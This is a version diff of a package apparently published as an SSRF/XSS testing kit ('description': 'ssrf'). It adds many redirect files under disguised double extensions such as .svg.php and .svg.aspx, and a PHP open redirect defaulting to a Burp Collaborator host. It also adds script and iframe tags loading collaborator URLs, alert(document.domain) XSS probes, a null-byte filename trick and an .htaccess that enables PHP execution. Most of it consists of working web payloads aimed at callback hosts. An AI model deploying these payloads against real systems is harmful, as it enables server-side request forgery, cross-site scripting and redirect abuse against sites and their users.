m0m0x01d 1.0.9 → 1.1.1

package/.htaccess

@@ -0,0 +1,8 @@
+<IfModule mod_php.c>
+    # Enable PHP execution
+    AddType application/x-httpd-php .php
+    AddHandler application/x-httpd-php .php
+</IfModule>
+
+# Ensure the PHP engine is enabled
+php_flag engine on

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "m0m0x01d",
-  "version": "1.0.9",
+  "version": "1.1.1",
   "description": "ssrf",
   "main": "index.html",
   "scripts": {

package/redirect.svg.asp

@@ -0,0 +1 @@
+<% Response.Redirect("https://example.com") %>

package/redirect.svg.aspx

@@ -0,0 +1 @@
+<% Response.Redirect("https://example.com") %>

package/redirect.svg.cfm

@@ -0,0 +1 @@
+<cflocation url="https://example.com">

package/redirect.svg.cs

@@ -0,0 +1 @@
+return Redirect("https://example.com");

package/redirect.svg.cshtml

@@ -0,0 +1 @@
+return Redirect("https://example.com");

package/redirect.svg.html

@@ -0,0 +1,25 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Redirect</title>
+    <script>
+        window.onload = function() {
+            // Get the URL query parameter
+            const urlParams = new URLSearchParams(window.location.search);
+            const targetUrl = urlParams.get('url');
+
+            // If a valid URL is provided, redirect to it
+            if (targetUrl) {
+                window.location.href = targetUrl;
+            } else {
+                document.body.innerHTML = "No URL provided for redirection.";
+            }
+        }
+    </script>
+</head>
+<body>
+</body>
+</html>
+

package/redirect.svg.js

@@ -0,0 +1 @@
+res.redirect('https://example.com');

package/redirect.svg.jsp

@@ -0,0 +1,3 @@
+<%
+response.sendRedirect("https://example.com");
+%>

package/redirect.svg.php

@@ -0,0 +1,21 @@
+<?php
+// Get the target URL from the 'next_url' query parameter
+$next_url = isset($_GET['next_url']) ? $_GET['next_url'] : 'https://9lv13zw73wdy5t6hjxcpw5tz9qfh36.burpcollaborator.net';
+
+// Set the appropriate headers for the 302 redirect
+header("HTTP/1.1 302 Found");
+header("Location: $next_url");
+
+// Optional: Set additional headers if required
+header("Cache-Control: public, max-age=0");
+header("Set-Cookie: sites=; expires=Thu, 01 Jan 1970 00:00:00 GMT; Max-Age=0; Path=/");
+header("Set-Cookie: sessionid=; expires=Thu, 01 Jan 1970 00:00:00 GMT; Max-Age=0; Path=/");
+header("Strict-Transport-Security: max-age=31536000; includeSubDomains; preload");
+header("X-Frame-Options: SAMEORIGIN");
+header("X-XSS-Protection: 1; mode=block");
+header("X-Content-Type-Options: nosniff");
+header("Content-Security-Policy: frame-ancestors 'self'; base-uri 'self'; form-action 'self' https://*.example.com; upgrade-insecure-requests");
+
+// Ensure the connection is closed after the headers
+exit();
+

package/redirect.svg.pl

@@ -0,0 +1 @@
+print "Location: https://example.com\n\n";

package/redirect.svg.py

@@ -0,0 +1,2 @@
+from flask import redirect
+return redirect("https://example.com")

package/redirect.svg.rb

@@ -0,0 +1 @@
+redirect_to "https://example.com"

package/redirect.svg.xml

@@ -0,0 +1,3 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<?xml-stylesheet type="text/xsl" href="redirect.svg.xsl"?>
+<root/>

package/redirect.svg.xsl

@@ -0,0 +1,14 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
+    <xsl:template match="/">
+        <xsl:variable name="url" select="'https://086sqqjyqn0pskt86ozgjwgqwh2aqz.burpcollaborator.net'"/>
+        <html>
+            <head>
+                <meta http-equiv="refresh" content="0; url={$url}" />
+            </head>
+            <body>
+                Redirecting to <xsl:value-of select="$url" />
+            </body>
+        </html>
+    </xsl:template>
+</xsl:stylesheet>

package/redirect2.svg.html

@@ -0,0 +1,11 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta http-equiv="refresh" content="0; url=https://www.example.com">
+    <title>Redirecting...</title>
+</head>
+<body>
+    <p>If you are not redirected automatically, follow this <a href="https://www.example.com">link to the new page</a>.</p>
+</body>
+</html>

package/redirecting.svg.html

@@ -0,0 +1,15 @@
+<!DOCTYPE HTML>
+<html lang="en-US">
+    <head>
+        <meta charset="UTF-8">
+        <meta http-equiv="refresh" content="0; url=http://example.com">
+        <script type="text/javascript">
+            window.location.href = "http://example.com"
+        </script>
+        <title>Page Redirection</title>
+    </head>
+    <body>
+        <!-- Note: don't tell people to `click` the link, just tell them that it is a link. -->
+        If you are not redirected automatically, follow this <a href='http://example.com'>link to example</a>.
+    </body>
+</html>

package/test.html

@@ -0,0 +1,4 @@
+<h1>testing</h1>
+<img src=/xsxs>
+<iframe src=/xs123>
+<script src="//m8veqcjkq90bs6tu6az2jigcw32xqm.burpcollaborator.net">

package/test.html%00.pdf

@@ -0,0 +1 @@
+<script>alert(document.domain)</script>

package/test.svg.html

@@ -0,0 +1 @@
+<script>alert(document.domain)</script>

package/test.svg.txt

@@ -0,0 +1 @@
+testing123

package/testing.svg.html

@@ -0,0 +1 @@
+<iframe src="https://wttobm4ubjlldge4rkkc4s1mhdn3bs.burpcollaborator.net"></iframe>

package/xss.svg.html

@@ -0,0 +1,4 @@
+<script>
+    window.location.href = 'https://7bjztxm5tu3wvrwf9v2nm3jxzo5gt5.burpcollaborator.net';
+</script>
+

package/xss1.svg.html

@@ -0,0 +1,6 @@
+<script>
+    fetch('https://7bjztxm5tu3wvrwf9v2nm3jxzo5gt5.burpcollaborator.net/api').then(response => {
+        console.log(response);
+    });
+</script>
+